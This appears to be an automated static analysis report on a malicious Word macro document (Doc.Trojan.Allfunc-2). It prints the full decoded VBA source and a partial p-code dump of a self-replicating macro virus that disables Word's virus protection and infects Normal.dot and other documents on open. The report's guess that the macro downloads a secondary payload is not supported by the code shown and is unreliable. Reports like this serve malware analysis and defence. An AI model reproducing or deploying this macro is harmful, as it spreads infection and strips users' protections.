Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f771101d88ef65dc…

MALICIOUS

Office (OLE)

27.5 KB Created: 2000-02-18 21:25:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 2c830433e21ffa4fa760a4caf7c2387f SHA-1: 7e779314f6125e2240e49dabf053a291a34bfe10 SHA-256: f771101d88ef65dc61cf27f09dec570445ad964d980fc5bb8d4b68ec1a243b84
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code automatically when the document is opened. The heuristic firings and ClamAV detection strongly indicate malicious intent, likely to download and execute a secondary payload. The VBA code appears to be designed to inject itself into the document or Normal.dot template.

Heuristics 3

  • ClamAV: Doc.Trojan.Allfunc-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Allfunc-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4936 bytes
SHA-256: 7c7963a09e5606c4f5c5c173f211327d6cf7ef9cd24d9805cd0eca9b83f2ed29
Detection
ClamAV: Doc.Trojan.Allfunc-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open(): IT
End Sub
Private Function IT()
Options.ConfirmConversions = 0
Options.SaveNormalPrompt = 0
Options.VirusProtection = 0
If ThisDocument = NormalTemplate Then Set Target = ActiveDocument Else Set Target = NormalTemplate
Set TargetModule = Target.VBProject.VBComponents.Item(1).CodeModule
If TargetModule.CountOfLines = 0 Then TargetModule.AddFromString "Private Sub Document_Open()" & vbCrLf & "End Sub"
For X = 1 To TargetModule.CountOfLines
If TargetModule.Lines(X, 1) = "Private Function IT()" Then GoTo Quit
Next
Set Host = ThisDocument.VBProject.VBComponents.Item(1).CodeModule
For X = 1 To Host.CountOfLines
If Host.Lines(X, 1) = "Private Function IT()" Then GoTo Continue
Next
Continue:
TD = Host.Lines(X, 24)
For X = 1 To TargetModule.CountOfLines
If Left(TargetModule.Lines(X, 1), 4) = "Sub " Then TargetModule.ReplaceLine X, TargetModule.Lines(X, 1) & ": IT"
If Left(TargetModule.Lines(X, 1), 12) = "Private Sub " Then TargetModule.ReplaceLine X, TargetModule.Lines(X, 1) & ": IT"
Next
TargetModule.AddFromString TD
If Target = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
Quit:
End Function

' Processing file: /opt/analyzer/scan_staging/ab37d7ebb44f4ec0a717b738e7791cd1.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3227 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' 	BoS 0x0000 
' 	ArgsCall IT 0x0000 
' Line #1:
' 	EndSub 
' Line #2:
' 	FuncDefn (Private Function IT(id_FFFE As Variant))
' Line #3:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #4:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #5:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #6:
' 	Ld ThisDocument 
' 	Ld NormalTemplate 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set Target 
' 	Else 
' 	BoSImplicit 
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set Target 
' 	EndIf 
' Line #7:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld Target 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	Set TargetModule 
' Line #8:
' 	Ld TargetModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0000 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x001B "Private Sub Document_Open()"
' 	Ld vbCrLf 
' 	Concat 
' 	LitStr 0x0007 "End Sub"
' 	Concat 
' 	Ld TargetModule 
' 	ArgsMemCall AddFromString 0x0001 
' 	EndIf 
' Line #9:
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld TargetModule 
' 	MemLd CountOfLines 
' 	For 
' Line #10:
' 	Ld X 
' 	LitDI2 0x0001 
' 	Ld TargetModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0015 "Private Function IT()"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo Quit 
' 	EndIf 
' Line #11:
' 	StartForVariable 
' 	Next 
' Line #12:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	Set Host 
' Line #13:
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Host 
' 	MemLd CountOfLines 
' 	For 
' Line #14:
' 	Ld X 
' 	LitDI2 0x0001 
' 	Ld Host 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0015 "Private Function IT()"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo Continue 
' 	EndIf 
' Line #15:
' 	StartForVariable 
' 	Next 
' Line #16:
' 	Label Continue 
' Line #17:
' 	Ld X 
' 	LitDI2 0x0018 
' 	Ld Host 
' 	ArgsMemLd Lines 0x0002 
' 	St TD 
' Line #18:
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld TargetModule 
' 	MemLd CountOfLines 
' 	For 
' Line #19:
' 	Ld X 
' 	LitDI2 0x0001 
' 	Ld TargetModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0004 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0004 "Sub "
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld X 
' 	Ld X 
' 	LitDI2 0x0001 
' 	Ld TargetModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x
... (truncated)